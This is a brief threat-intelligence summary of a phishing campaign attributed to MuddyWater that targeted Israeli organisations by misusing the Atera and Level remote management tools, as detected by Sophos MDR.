MuddyWater Campaign Targets Israeli Organizations with RMM Tool Misuse

Sophos MDR has identified a targeted phishing campaign, with moderate confidence attributed to the Iranian-linked threat actor group MuddyWater (TA450), which targeted organisations in Israel. The campaign involved phishing emails that tricked users into downloading a ZIP file containing an installer for the legitimate remote management tool Atera. After gaining access, the threat actors misused Atera, using a trial account believed to be compromised, to install the Atera Agent and run a PowerShell script for credential dumping and creating a backup of the SYSTEM registry hive, which Sophos behavioural rules detected and blocked. Post-compromise activities included domain enumeration commands, establishing an SSH tunnel to a remote IP address, and downloading another remote management tool, Level RMM, via an obfuscated PowerShell command. This campaign's tactics align with previously reported activity by TA450 and highlights the tactic of abusing legitimate software for malicious purposes.